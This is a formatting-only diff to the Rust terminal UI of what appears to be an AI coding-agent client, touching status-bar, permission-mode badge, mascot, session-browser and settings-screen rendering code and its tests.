-            spans.push(Span::styled(run.clone(), if run_bright { bright } else { base }));
+            spans.push(Span::styled(
+                run.clone(),
+                if run_bright { bright } else { base },
+            ));
             run.clear();
         }
         run_bright = is_bright;
@@ -1861,7 +2008,9 @@ fn render_footer(frame: &mut Frame, app: &App, area: Rect) {
         if let Some(ref badge) = app.agent_type_badge {
             spans.push(Span::styled(
                 format!("\u{2699} {}", badge),
-                Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD),
+                Style::default()
+                    .fg(Color::Cyan)
+                    .add_modifier(Modifier::BOLD),
             ));
         }
 
@@ -1904,10 +2053,7 @@ fn render_footer(frame: &mut Frame, app: &App, area: Rect) {
             } else {
                 format!("\u{27f3} {} tasks", app.background_task_count)
             };
-            spans.push(Span::styled(
-                label,
-                Style::default().fg(Color::Yellow),
-            ));
+            spans.push(Span::styled(label, Style::default().fg(Color::Yellow)));
         } else if let Some(ref task_status) = app.background_task_status {
             if !spans.is_empty() {
                 spans.push(Span::raw("  "));
@@ -1925,13 +2071,43 @@ fn render_footer(frame: &mut Frame, app: &App, area: Rect) {
                 spans.push(Span::raw("  "));
             }
             let (label, style) = match app.prompt_input.vim_mode {
-                VimMode::Insert      => ("-- INSERT --",       Style::default().fg(Color::DarkGray)),
-                VimMode::Normal      => ("-- NORMAL --",       Style::default().fg(Color::Green).add_modifier(Modifier::BOLD)),
-                VimMode::Visual      => ("-- VISUAL --",       Style::default().fg(Color::Magenta).add_modifier(Modifier::BOLD)),
-                VimMode::VisualLine  => ("-- VISUAL LINE --",  Style::default().fg(Color::Magenta).add_modifier(Modifier::BOLD)),
-                VimMode::VisualBlock => ("-- VISUAL BLOCK --", Style::default().fg(Color::Magenta).add_modifier(Modifier::BOLD)),
-                VimMode::Command     => ("-- COMMAND --",      Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD)),
-                VimMode::Search      => ("-- SEARCH --",       Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD)),
+                VimMode::Insert => ("-- INSERT --", Style::default().fg(Color::DarkGray)),
+                VimMode::Normal => (
+                    "-- NORMAL --",
+                    Style::default()
+                        .fg(Color::Green)
+                        .add_modifier(Modifier::BOLD),
+                ),
+                VimMode::Visual => (
+                    "-- VISUAL --",
+                    Style::default()
+                        .fg(Color::Magenta)
+                        .add_modifier(Modifier::BOLD),
+                ),
+                VimMode::VisualLine => (
+                    "-- VISUAL LINE --",
+                    Style::default()
+                        .fg(Color::Magenta)
+                        .add_modifier(Modifier::BOLD),
+                ),
+                VimMode::VisualBlock => (
+                    "-- VISUAL BLOCK --",
+                    Style::default()
+                        .fg(Color::Magenta)
+                        .add_modifier(Modifier::BOLD),
+                ),
+                VimMode::Command => (
+                    "-- COMMAND --",
+                    Style::default()
+                        .fg(Color::Cyan)
+                        .add_modifier(Modifier::BOLD),
+                ),
+                VimMode::Search => (
+                    "-- SEARCH --",
+                    Style::default()
+                        .fg(Color::Yellow)
+                        .add_modifier(Modifier::BOLD),
+                ),
             };
             spans.push(Span::styled(label, style));
         }
@@ -1943,7 +2119,9 @@ fn render_footer(frame: &mut Frame, app: &App, area: Rect) {
             }
             spans.push(Span::styled(
                 "[BASH]",
-                Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD),
+                Style::default()
+                    .fg(Color::Yellow)
+                    .add_modifier(Modifier::BOLD),
             ));
         }
 
@@ -1953,25 +2131,28 @@ fn render_footer(frame: &mut Frame, app: &App, area: Rect) {
             use claurst_core::config::PermissionMode;
             match &app.config.permission_mode {
                 PermissionMode::BypassPermissions => {
-                    if !spans.is_empty() { spans.push(Span::raw("  ")); }
+                    if !spans.is_empty() {
+                        spans.push(Span::raw("  "));
+                    }
                     spans.push(Span::styled(
                         "\u{23f5}\u{23f5} bypass",
                         Style::default().fg(Color::Red).add_modifier(Modifier::BOLD),
                     ));
                 }
                 PermissionMode::AcceptEdits => {
-                    if !spans.is_empty() { spans.push(Span::raw("  ")); }
+                    if !spans.is_empty() {
+                        spans.push(Span::raw("  "));
+                    }
                     spans.push(Span::styled(
                         "accept-edits",
                         Style::default().fg(Color::Yellow),
                     ));
                 }
                 PermissionMode::Plan => {
-                    if !spans.is_empty() { spans.push(Span::raw("  ")); }
-                    spans.push(Span::styled(
-                        "plan",
-                        Style::default().fg(Color::Blue),
-                    ));
+                    if !spans.is_empty() {
+                        spans.push(Span::raw("  "));
+                    }
+                    spans.push(Span::styled("plan", Style::default().fg(Color::Blue)));
                 }
                 PermissionMode::Default => {}
             }
@@ -2003,7 +2184,8 @@ fn render_footer(frame: &mut Frame, app: &App, area: Rect) {
         //    When an update is available and context is below 85%, show the update notification
         //    instead to keep the status bar uncluttered.
         if app.context_window_size > 0 {
-            let used_pct = (app.context_used_tokens as f64 / app.context_window_size as f64 * 100.0) as u64;
+            let used_pct =
+                (app.context_used_tokens as f64 / app.context_window_size as f64 * 100.0) as u64;
             let left_pct = 100u64.saturating_sub(used_pct);
 
             if !parts.is_empty() {
@@ -2027,7 +2209,9 @@ fn render_footer(frame: &mut Frame, app: &App, area: Rect) {
                 // Update available and context is fine — show update nudge in bottom-right.
                 parts.push(Span::styled(
                     format!("⬆ v{} available  Run: /update", version),
-                    Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD),
+                    Style::default()
+                        .fg(Color::Yellow)
+                        .add_modifier(Modifier::BOLD),
                 ));
             } else if used_pct >= 70 {
                 // 70–84%: mild warning.
@@ -2056,10 +2240,7 @@ fn render_footer(frame: &mut Frame, app: &App, area: Rect) {
             } else {
                 format!("${:.2}", app.cost_usd)
             };
-            parts.push(Span::styled(
-                cost_str,
-                Style::default().fg(Color::DarkGray),
-            ));
+            parts.push(Span::styled(cost_str, Style::default().fg(Color::DarkGray)));
         }
 
         // 3b. Token budget (feature-gated)
@@ -2094,7 +2275,11 @@ fn render_footer(frame: &mut Frame, app: &App, area: Rect) {
                 if !parts.is_empty() {
                     parts.push(Span::raw("  "));
                 }
-                let color = if pct >= 90.0 { Color::Red } else { Color::Yellow };
+                let color = if pct >= 90.0 {
+                    Color::Red
+                } else {
+                    Color::Yellow
+                };
                 parts.push(Span::styled(
                     format!("5h:{:.0}%", pct),
                     Style::default().fg(color),
@@ -2106,7 +2291,11 @@ fn render_footer(frame: &mut Frame, app: &App, area: Rect) {
                 if !parts.is_empty() {
                     parts.push(Span::raw("  "));
                 }
-                let color = if pct >= 90.0 { Color::Red } else { Color::Yellow };
+                let color = if pct >= 90.0 {
+                    Color::Red
+                } else {
+                    Color::Yellow
+                };
                 parts.push(Span::styled(
                     format!("7d:{:.0}%", pct),
                     Style::default().fg(color),
@@ -2137,7 +2326,6 @@ fn render_footer(frame: &mut Frame, app: &App, area: Rect) {
                 Style::default().fg(Color::Green),
             ));
         }
-
 
         // Output style indicator (only when non-default)
         if app.output_style != "auto" {
@@ -2170,7 +2358,9 @@ fn render_footer(frame: &mut Frame, app: &App, area: Rect) {
             }
             parts.push(Span::styled(
                 format!("⬆ v{} available — /update", version),
-                Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD),
+                Style::default()
+                    .fg(Color::Yellow)
+                    .add_modifier(Modifier::BOLD),
             ));
         }
 
@@ -2228,12 +2418,16 @@ fn render_prompt_suggestions(frame: &mut Frame, app: &App, area: Rect) {
     for (row, suggestion) in suggestions[start..end].iter().enumerate() {
         let is_selected = start + row == selected;
         let accent_style = if is_selected {
-            Style::default().fg(CLAUDE_ORANGE).add_modifier(Modifier::BOLD)
+            Style::default()
+                .fg(CLAUDE_ORANGE)
+                .add_modifier(Modifier::BOLD)
         } else {
             Style::default().fg(Color::DarkGray)
         };
         let label_style = if is_selected {
-            Style::default().fg(CLAUDE_ORANGE).add_modifier(Modifier::BOLD)
+            Style::default()
+                .fg(CLAUDE_ORANGE)
+                .add_modifier(Modifier::BOLD)
         } else {
             Style::default().fg(Color::White)
         };
@@ -2242,7 +2436,10 @@ fn render_prompt_suggestions(frame: &mut Frame, app: &App, area: Rect) {
         } else {
             Style::default().fg(Color::DarkGray)
         };
-        let mut spans = vec![Span::styled(if is_selected { "\u{203a} " } else { "  " }, accent_style)];
+        let mut spans = vec![Span::styled(
+            if is_selected { "\u{203a} " } else { "  " },
+            accent_style,
+        )];
         match suggestion.source {
             TypeaheadSource::SlashCommand => {
                 let display_name = truncate_text(&suggestion.text, label_width);
@@ -2250,7 +2447,10 @@ fn render_prompt_suggestions(frame: &mut Frame, app: &App, area: Rect) {
                     format!("{display_name:<width$}", width = label_width),
                     label_style,
                 ));
-                spans.push(Span::styled(" [cmd] ", Style::default().fg(Color::DarkGray)));
+                spans.push(Span::styled(
+                    " [cmd] ",
+                    Style::default().fg(Color::DarkGray),
+                ));
                 if !suggestion.description.is_empty() {
                     spans.push(Span::styled(
                         truncate_text(
@@ -2268,7 +2468,10 @@ fn render_prompt_suggestions(frame: &mut Frame, app: &App, area: Rect) {
                     label_style,
                 ));
                 if !suggestion.description.is_empty() {
-                    spans.push(Span::styled(" \u{2014} ", Style::default().fg(Color::DarkGray)));
+                    spans.push(Span::styled(
+                        " \u{2014} ",
+                        Style::default().fg(Color::DarkGray),
+                    ));
                     spans.push(Span::styled(
                         truncate_text(&suggestion.description, area.width as usize / 2),
                         detail_style,
@@ -2281,7 +2484,10 @@ fn render_prompt_suggestions(frame: &mut Frame, app: &App, area: Rect) {
                     format!("{display_name:<width$}", width = label_width),
                     label_style,
                 ));
-                spans.push(Span::styled(" [history] ", Style::default().fg(Color::DarkGray)));
+                spans.push(Span::styled(
+                    " [history] ",
+                    Style::default().fg(Color::DarkGray),
+                ));
                 if !suggestion.description.is_empty() {
                     spans.push(Span::styled(
                         truncate_text(&suggestion.description, area.width as usize / 2),
@@ -2386,8 +2592,8 @@ fn render_legacy_history_search(
 ) {
     let dialog_width = 60u16.min(area.width.saturating_sub(4));
     let visible_matches = 8usize;
-    let dialog_height =
-        (4 + visible_matches.min(hs.matches.len().max(1)) as u16).min(area.height.saturating_sub(4));
+    let dialog_height = (4 + visible_matches.min(hs.matches.len().max(1)) as u16)
+        .min(area.height.saturating_sub(4));
     let dialog_area = crate::overlays::centered_rect(dialog_width, dialog_height, area);
 
     frame.render_widget(Clear, dialog_area);
@@ -2397,7 +2603,9 @@ fn render_legacy_history_search(
         Span::raw("  Search: "),
         Span::styled(
             hs.query.clone(),
-            Style::default().fg(Color::White).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::White)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled("\u{2588}", Style::default().fg(Color::White)),
     ]));
@@ -2468,8 +2676,8 @@ pub struct StatusLineData {
     pub tokens_used: u64,
     pub tokens_total: u64,
     pub cost_cents: f64,
-    pub compact_warning_pct: Option<f64>,  // None = no warning; Some(pct) = show warning
-    pub vim_mode: Option<String>,           // None = no vim mode; Some("NORMAL") etc.
+    pub compact_warning_pct: Option<f64>, // None = no warning; Some(pct) = show warning
+    pub vim_mode: Option<String>,         // None = no vim mode; Some("NORMAL") etc.
     pub bridge_connected: bool,
     pub session_id: Option<String>,
     pub worktree: Option<String>,
@@ -2478,7 +2686,11 @@ pub struct StatusLineData {
     pub rate_limit_pct_7d: Option<f64>,
 }
 
-pub fn render_full_status_line(data: &StatusLineData, area: Rect, buf: &mut ratatui::buffer::Buffer) {
+pub fn render_full_status_line(
+    data: &StatusLineData,
+    area: Rect,
+    buf: &mut ratatui::buffer::Buffer,
+) {
     use ratatui::{
         style::{Color, Modifier, Style},
         text::{Line, Span},
@@ -2499,7 +2711,13 @@ pub fn render_full_status_line(data: &StatusLineData, area: Rect, buf: &mut rata
     // Context window
     if data.tokens_total > 0 {
         let pct = data.tokens_used as f64 / data.tokens_total as f64;
-        let ctx_color = if pct >= 0.95 { Color::Red } else if pct >= 0.80 { Color::Yellow } else { Color::Green };
+        let ctx_color = if pct >= 0.95 {
+            Color::Red
+        } else if pct >= 0.80 {
+            Color::Yellow
+        } else {
+            Color::Green
+        };
         let used_k = data.tokens_used / 1000;
         let total_k = data.tokens_total / 1000;
         spans.push(Span::styled(
@@ -2521,7 +2739,11 @@ pub fn render_full_status_line(data: &StatusLineData, area: Rect, buf: &mut rata
     // Compact warning
     if let Some(pct) = data.compact_warning_pct {
         if pct >= 0.80 {
-            let color = if pct >= 0.95 { Color::Red } else { Color::Yellow };
+            let color = if pct >= 0.95 {
+                Color::Red
+            } else {
+                Color::Yellow
+            };
             spans.push(Span::styled(
                 format!("âš  ctx {:.0}% ", pct * 100.0),
                 Style::default().fg(color).add_modifier(Modifier::BOLD),
@@ -2555,10 +2777,7 @@ pub fn render_full_status_line(data: &StatusLineData, area: Rect, buf: &mut rata
 
     // Bridge connected
     if data.bridge_connected {
-        spans.push(Span::styled(
-            "ðŸ”— ",
-            Style::default().fg(Color::Green),
-        ));
+        spans.push(Span::styled("ðŸ”— ", Style::default().fg(Color::Green)));
     }
 
     // Session ID
@@ -2583,7 +2802,6 @@ pub fn render_full_status_line(data: &StatusLineData, area: Rect, buf: &mut rata
         .style(Style::default().bg(Color::Black))
         .render(area, buf);
 }
-
 
 // ---------------------------------------------------------------------------
 // Multi-agent UI components
@@ -2612,15 +2830,10 @@ pub fn render_agent_progress_line(
     let mut spans = vec![
         Span::styled(
             format!("[agent-{}]", agent_id),
-            Style::default()
-                .fg(Color::Cyan)
-                .add_modifier(Modifier::DIM),
+            Style::default().fg(Color::Cyan).add_modifier(Modifier::DIM),
         ),
         Span::raw(" "),
-        Span::styled(
-            status.to_string(),
-            Style::default().fg(status_color),
-        ),
+        Span::styled(status.to_string(), Style::default().fg(status_color)),
     ];
 
     if let Some(tool) = current_tool {
@@ -2663,12 +2876,13 @@ pub fn render_coordinator_status_lines(
                 .fg(Color::Cyan)
                 .add_modifier(Modifier::BOLD),
         ),
+        Span::styled(" · ".to_string(), Style::default().fg(Color::DarkGray)),
         Span::styled(
-            " · ".to_string(),
-            Style::default().fg(Color::DarkGray),
-        ),
-        Span::styled(
-            format!("{} agent{}", agent_count, if agent_count == 1 { "" } else { "s" }),
+            format!(
+                "{} agent{}",
+                agent_count,
+                if agent_count == 1 { "" } else { "s" }
+            ),
             Style::default().fg(Color::White),
         ),
         Span::styled(
@@ -2705,10 +2919,7 @@ pub fn render_coordinator_status_lines(
 /// # Arguments
 /// * `teammate_id`  — teammate identifier string
 /// * `session_info` — optional session info snippet to append
-pub fn render_teammate_header(
-    teammate_id: &str,
-    session_info: Option<&str>,
-) -> Line<'static> {
+pub fn render_teammate_header(teammate_id: &str, session_info: Option<&str>) -> Line<'static> {
     let mut spans = vec![
         Span::styled(
             "┤ teammate: ".to_string(),
@@ -2720,10 +2931,7 @@ pub fn render_teammate_header(
                 .fg(Color::Magenta)
                 .add_modifier(Modifier::BOLD),
         ),
-        Span::styled(
-            " ├".to_string(),
-            Style::default().fg(Color::Magenta),
-        ),
+        Span::styled(" ├".to_string(), Style::default().fg(Color::Magenta)),
     ];
 
     if let Some(info) = session_info {

--- a/src-rust/crates/tui/src/rustle.rs
+++ b/src-rust/crates/tui/src/rustle.rs
@@ -23,7 +23,9 @@ pub enum RustlePose {
     LookRight,
     LookDown,
     /// Loading / error spinner — `frame` drives the animation.
-    Loading { frame: u64 },
+    Loading {
+        frame: u64,
+    },
 }
 
 /// Body-part style: bold pink foreground (#e91e63).
@@ -59,7 +61,11 @@ fn eye_spans(s: &'static str) -> Vec<Span<'static>> {
     for ch in s.chars() {
         let is_eyeball = ch == '▘' || ch == '▝' || ch == '▀' || ch == '▄' || ch == '▖';
         if is_eyeball != buf_is_eyeball && !buf.is_empty() {
-            let style = if buf_is_eyeball { eyeball_style() } else { eye_bg_style() };
+            let style = if buf_is_eyeball {
+                eyeball_style()
+            } else {
+                eye_bg_style()
+            };
             spans.push(Span::styled(buf.clone(), style));
             buf.clear();
         }
@@ -67,7 +73,11 @@ fn eye_spans(s: &'static str) -> Vec<Span<'static>> {
         buf.push(ch);
     }
     if !buf.is_empty() {
-        let style = if buf_is_eyeball { eyeball_style() } else { eye_bg_style() };
+        let style = if buf_is_eyeball {
+            eyeball_style()
+        } else {
+            eye_bg_style()
+        };
         spans.push(Span::styled(buf, style));
     }
     spans
@@ -123,22 +133,34 @@ fn loading_eye_spans(frame: u64) -> Vec<Span<'static>> {
         // Left eye: previous (dim) then current (bright)
         Span::styled(
             left_prev_ch.to_string(),
-            Style::default().fg(COLORS[2]).bg(Color::Black).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(COLORS[2])
+                .bg(Color::Black)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(
             left_ch.to_string(),
-            Style::default().fg(left_color).bg(Color::Black).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(left_color)
+                .bg(Color::Black)
+                .add_modifier(Modifier::BOLD),
         ),
         // Nose
         Span::styled("█".to_string(), eye_bg_style()),
         // Right eye: current (bright) then previous (dim)
         Span::styled(
             right_ch.to_string(),
-            Style::default().fg(right_color).bg(Color::Black).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(right_color)
+                .bg(Color::Black)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(
             right_prev_ch.to_string(),
-            Style::default().fg(COLORS[2]).bg(Color::Black).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(COLORS[2])
+                .bg(Color::Black)
+                .add_modifier(Modifier::BOLD),
         ),
     ]
 }
@@ -157,39 +179,39 @@ pub fn rustle_lines(pose: &RustlePose) -> [Line<'static>; 5] {
 
     let (r2l, r2e, r2r) = match pose {
         RustlePose::Default => (
-            "█▄█",       // left claw tip, ▄ gap-to-connect, head edge
-            "▀ █▀ ",    // keep the left eye as-is; match the right eye size and move it up-left
-            "█▄█",       // head edge, ▄ connect-to-gap, right claw tip
+            "█▄█",   // left claw tip, ▄ gap-to-connect, head edge
+            "▀ █▀ ", // keep the left eye as-is; match the right eye size and move it up-left
+            "█▄█",   // head edge, ▄ connect-to-gap, right claw tip
         ),
         RustlePose::ArmsUp => (
-            "█▀█",       // ▀ = claw raised (upper half = arm up)
-            "▀ █▀ ",    // keep the left eye as-is; match the right eye size and move it up-left
-            "█▀█",       // raised right claw
+            "█▀█",   // ▀ = claw raised (upper half = arm up)
+            "▀ █▀ ", // keep the left eye as-is; match the right eye size and move it up-left
+            "█▀█",   // raised right claw
         ),
         RustlePose::LookLeft => (
             "█▄█",
-            "▘ █ ▘",    // single-pixel upper-left quarter blocks = eyes shifted left
+            "▘ █ ▘", // single-pixel upper-left quarter blocks = eyes shifted left
             "█▄█",
         ),
         RustlePose::LookRight => (
             "█▄█",
-            "▝ █ ▝",    // single-pixel upper-right quarter blocks = eyes shifted right
+            "▝ █ ▝", // single-pixel upper-right quarter blocks = eyes shifted right
             "█▄█",
         ),
         RustlePose::LookDown => (
             "█▄█",
-            "▄ █▄ ",    // lower-half blocks = eyes shifted down
+            "▄ █▄ ", // lower-half blocks = eyes shifted down
             "█▄█",
         ),
         RustlePose::Loading { .. } => (
-            "█▄█", "", "█▄█",  // eyes built separately via loading_eye_spans
+            "█▄█",
+            "",
+            "█▄█", // eyes built separately via loading_eye_spans
         ),
     };
 
     // Row 1: head — narrow top (5-wide), wider bottom (7-wide)
-    let row1 = Line::from(vec![
-        Span::styled("  ▄█████▄  ".to_string(), body_style()),
-    ]);
+    let row1 = Line::from(vec![Span::styled("  ▄█████▄  ".to_string(), body_style())]);
 
     // Row 2: claws extending from sides + face with eyeball highlights (widest row)
     let mut row2_spans = vec![Span::styled(r2l.to_string(), body_style())];
@@ -202,14 +224,10 @@ pub fn rustle_lines(pose: &RustlePose) -> [Line<'static>; 5] {
     let row2 = Line::from(row2_spans);
 
     // Row 3: body
-    let row3 = Line::from(vec![
-        Span::styled(" ████████  ".to_string(), body_style()),
-    ]);
+    let row3 = Line::from(vec![Span::styled(" ████████  ".to_string(), body_style())]);
 
     // Row 4: legs — upper half body (6-wide), lower half two leg pairs (2+gap+2)
-    let row4 = Line::from(vec![
-        Span::styled("  ██▀▀██   ".to_string(), body_style()),
-    ]);
+    let row4 = Line::from(vec![Span::styled("  ██▀▀██   ".to_string(), body_style())]);
 
     // Row 5: blank spacing
     let row5 = Line::from("");

--- a/src-rust/crates/tui/src/session_branching.rs
+++ b/src-rust/crates/tui/src/session_branching.rs
@@ -204,11 +204,7 @@ impl SessionBranchingState {
 // ---------------------------------------------------------------------------
 
 /// Render the session branching overlay.
-pub fn render_session_branching(
-    state: &SessionBranchingState,
-    area: Rect,
-    buf: &mut Buffer,
-) {
+pub fn render_session_branching(state: &SessionBranchingState, area: Rect, buf: &mut Buffer) {
     if !state.visible {
         return;
     }
@@ -269,7 +265,13 @@ fn render_branch_list(state: &SessionBranchingState, area: Rect, buf: &mut Buffe
                 Span::raw("")
             };
             let line = Line::from(vec![
-                Span::raw(format!("{}[{}] {} ({})", marker, idx + 1, branch.name, branch.created_at)),
+                Span::raw(format!(
+                    "{}[{}] {} ({})",
+                    marker,
+                    idx + 1,
+                    branch.name,
+                    branch.created_at
+                )),
                 badge,
             ]);
             ListItem::new(line)
@@ -314,7 +316,9 @@ fn render_create_branch(state: &SessionBranchingState, area: Rect, buf: &mut Buf
             Span::raw(prompt),
             Span::styled(
                 &state.create_input,
-                Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD),
+                Style::default()
+                    .fg(Color::Yellow)
+                    .add_modifier(Modifier::BOLD),
             ),
             Span::raw("_"),
         ]),
@@ -342,7 +346,10 @@ fn render_confirm_delete(state: &SessionBranchingState, area: Rect, buf: &mut Bu
         )),
         Line::from(""),
         Line::from(vec![
-            Span::styled("Y", Style::default().fg(Color::Red).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                "Y",
+                Style::default().fg(Color::Red).add_modifier(Modifier::BOLD),
+            ),
             Span::raw(" to confirm | "),
             Span::styled("Esc", Style::default().fg(Color::Cyan)),
             Span::raw(" to cancel"),

--- a/src-rust/crates/tui/src/session_browser.rs
+++ b/src-rust/crates/tui/src/session_browser.rs
@@ -253,17 +253,22 @@ pub fn render_session_browser(state: &SessionBrowserState, area: Rect, buf: &mut
         let title_w = inner_w.saturating_sub(fixed).max(10);
 
         // Header row
-        lines.push(Line::from(vec![
-            Span::styled(
-                format!("  {:<title_w$}  {:<date_w$}  {:>msgs_w$}  {:>cost_w$}",
-                    "Title", "Last Updated", "Msgs", "Cost",
-                    title_w = title_w, date_w = date_w,
-                    msgs_w = msgs_w, cost_w = cost_w),
-                Style::default()
-                    .fg(Color::DarkGray)
-                    .add_modifier(Modifier::UNDERLINED),
+        lines.push(Line::from(vec![Span::styled(
+            format!(
+                "  {:<title_w$}  {:<date_w$}  {:>msgs_w$}  {:>cost_w$}",
+                "Title",
+                "Last Updated",
+                "Msgs",
+                "Cost",
+                title_w = title_w,
+                date_w = date_w,
+                msgs_w = msgs_w,
+                cost_w = cost_w
             ),
-        ]));
+            Style::default()
+                .fg(Color::DarkGray)
+                .add_modifier(Modifier::UNDERLINED),
+        )]));
         lines.push(Line::from(""));
 
         for (i, session) in state.sessions.iter().enumerate() {
@@ -300,9 +305,15 @@ pub fn render_session_browser(state: &SessionBrowserState, area: Rect, buf: &mut
 
             lines.push(Line::from(vec![
                 Span::styled("  ", prefix_style),
-                Span::styled(format!("{:<title_w$}", title_cell, title_w = title_w), title_style),
+                Span::styled(
+                    format!("{:<title_w$}", title_cell, title_w = title_w),
+                    title_style,
+                ),
                 Span::styled("  ", meta_style),
-                Span::styled(format!("{:<date_w$}", date_cell, date_w = date_w), meta_style),
+                Span::styled(
+                    format!("{:<date_w$}", date_cell, date_w = date_w),
+                    meta_style,
+                ),
                 Span::styled("  ", meta_style),
                 Span::styled(msgs_cell, meta_style),
                 Span::styled("  ", meta_style),
@@ -320,22 +331,30 @@ pub fn render_session_browser(state: &SessionBrowserState, area: Rect, buf: &mut
                 Span::styled("  ", Style::default()),
                 Span::styled(
                     "\u{2191}\u{2193}",
-                    Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD),
+                    Style::default()
+                        .fg(Color::Cyan)
+                        .add_modifier(Modifier::BOLD),
                 ),
                 Span::styled(" navigate  ", Style::default().fg(Color::DarkGray)),
                 Span::styled(
                     "Enter",
-                    Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD),
+                    Style::default()
+                        .fg(Color::Cyan)
+                        .add_modifier(Modifier::BOLD),
                 ),
                 Span::styled("=resume  ", Style::default().fg(Color::DarkGray)),
                 Span::styled(
                     "r",
-                    Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD),
+                    Style::default()
+                        .fg(Color::Cyan)
+                        .add_modifier(Modifier::BOLD),
                 ),
                 Span::styled("=rename  ", Style::default().fg(Color::DarkGray)),
                 Span::styled(
                     "Esc",
-                    Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD),
+                    Style::default()
+                        .fg(Color::Cyan)
+                        .add_modifier(Modifier::BOLD),
                 ),
                 Span::styled("=close", Style::default().fg(Color::DarkGray)),
             ]));
@@ -346,7 +365,12 @@ pub fn render_session_browser(state: &SessionBrowserState, area: Rect, buf: &mut
             let cursor = "\u{2588}"; // block cursor
             let input_display = format!("{}{}", state.rename_input, cursor);
             lines.push(Line::from(vec![
-                Span::styled(label, Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD)),
+                Span::styled(
+                    label,
+                    Style::default()
+                        .fg(Color::Yellow)
+                        .add_modifier(Modifier::BOLD),
+                ),
                 Span::styled(
                     input_display,
                     Style::default()
@@ -358,12 +382,16 @@ pub fn render_session_browser(state: &SessionBrowserState, area: Rect, buf: &mut
                 Span::styled("  ", Style::default()),
                 Span::styled(
                     "Enter",
-                    Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD),
+                    Style::default()
+                        .fg(Color::Cyan)
+                        .add_modifier(Modifier::BOLD),
                 ),
                 Span::styled("=confirm  ", Style::default().fg(Color::DarkGray)),
                 Span::styled(
                     "Esc",
-                    Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD),
+                    Style::default()
+                        .fg(Color::Cyan)
+                        .add_modifier(Modifier::BOLD),
                 ),
                 Span::styled("=cancel", Style::default().fg(Color::DarkGray)),
             ]));
@@ -378,7 +406,9 @@ pub fn render_session_browser(state: &SessionBrowserState, area: Rect, buf: &mut
                 ),
                 Span::styled(
                     "Enter",
-                    Style::default().fg(Color::Green).add_modifier(Modifier::BOLD),
+                    Style::default()
+                        .fg(Color::Green)
+                        .add_modifier(Modifier::BOLD),
                 ),
                 Span::styled("=yes  ", Style::default().fg(Color::DarkGray)),
                 Span::styled(
@@ -525,7 +555,10 @@ mod tests {
         s.start_rename();
         s.rename_input = "  New Title  ".to_string(); // intentional whitespace
         let result = s.confirm_rename();
-        assert_eq!(result, Some(("sess-001".to_string(), "New Title".to_string())));
+        assert_eq!(
+            result,
+            Some(("sess-001".to_string(), "New Title".to_string()))
+        );
         assert_eq!(s.mode, SessionBrowserMode::Browse);
         assert!(s.rename_input.is_empty());
         // Also check local title was updated
@@ -551,7 +584,10 @@ mod tests {
         s.start_rename();
         s.cancel();
         assert_eq!(s.mode, SessionBrowserMode::Browse);
-        assert!(s.visible, "overlay should remain visible after cancel-from-rename");
+        assert!(
+            s.visible,
+            "overlay should remain visible after cancel-from-rename"
+        );
     }
 
     // 11. cancel() in Browse mode closes the overlay.
@@ -582,7 +618,11 @@ mod tests {
         let mut buf = Buffer::empty(area);
         render_session_browser(&s, area, &mut buf);
         for cell in buf.content() {
-            assert_eq!(cell.symbol(), " ", "buffer should be empty when browser is hidden");
+            assert_eq!(
+                cell.symbol(),
+                " ",
+                "buffer should be empty when browser is hidden"
+            );
         }
     }
 
@@ -599,7 +639,10 @@ mod tests {
     fn truncate_display_trims() {
         let long = "abcdefghij"; // 10 chars
         let result = truncate_display(long, 5);
-        assert!(result.width() <= 6, "truncated string should fit within budget");
+        assert!(
+            result.width() <= 6,
+            "truncated string should fit within budget"
+        );
         assert!(result.ends_with('…'));
     }
 }

--- a/src-rust/crates/tui/src/settings_screen.rs
+++ b/src-rust/crates/tui/src/settings_screen.rs
@@ -4,13 +4,13 @@
 // viewing and editing General, Display, Privacy, Advanced, and KeyBindings
 // settings. Changes are persisted via Settings::save_sync().
 
-use claurst_core::config::{Config, Settings};
-use claurst_core::keybindings::default_bindings;
-use claurst_core::output_styles::builtin_styles;
 use crate::overlays::{
     centered_rect, render_dark_overlay, render_dialog_bg, CLAURST_ACCENT, CLAURST_MUTED,
     CLAURST_PANEL_BG, CLAURST_TEXT,
 };
+use claurst_core::config::{Config, Settings};
+use claurst_core::keybindings::default_bindings;
+use claurst_core::output_styles::builtin_styles;
 use ratatui::layout::{Alignment, Constraint, Direction, Layout, Rect};
 use ratatui::style::{Color, Modifier, Style};
 use ratatui::text::{Line, Span};
@@ -70,7 +70,6 @@ pub struct SettingsScreen {
     pub pending_changes: std::collections::HashMap<String, String>,
 
     // ---- Real settings fields ----
-
     /// Whether auto-compact is enabled.
     pub auto_compact_enabled: bool,
     /// Auto-compact threshold (0-100%).
@@ -94,7 +93,11 @@ impl SettingsScreen {
         let auto_compact_enabled = settings_snapshot.config.auto_compact;
         let auto_compact_threshold = {
             let t = settings_snapshot.config.compact_threshold;
-            if t > 0.0 { (t * 100.0).round() as u8 } else { 95 }
+            if t > 0.0 {
+                (t * 100.0).round() as u8
+            } else {
+                95
+            }
         };
         Self {
             visible: false,
@@ -130,34 +133,22 @@ impl SettingsScreen {
             "autoCompact",
             self.settings_snapshot.config.auto_compact,
         );
-        self.auto_compact_threshold = read_setting_u8(
-            &self.settings_snapshot,
-            "autoCompactThreshold",
-            {
+        self.auto_compact_threshold =
+            read_setting_u8(&self.settings_snapshot, "autoCompactThreshold", {
                 let t = self.settings_snapshot.config.compact_threshold;
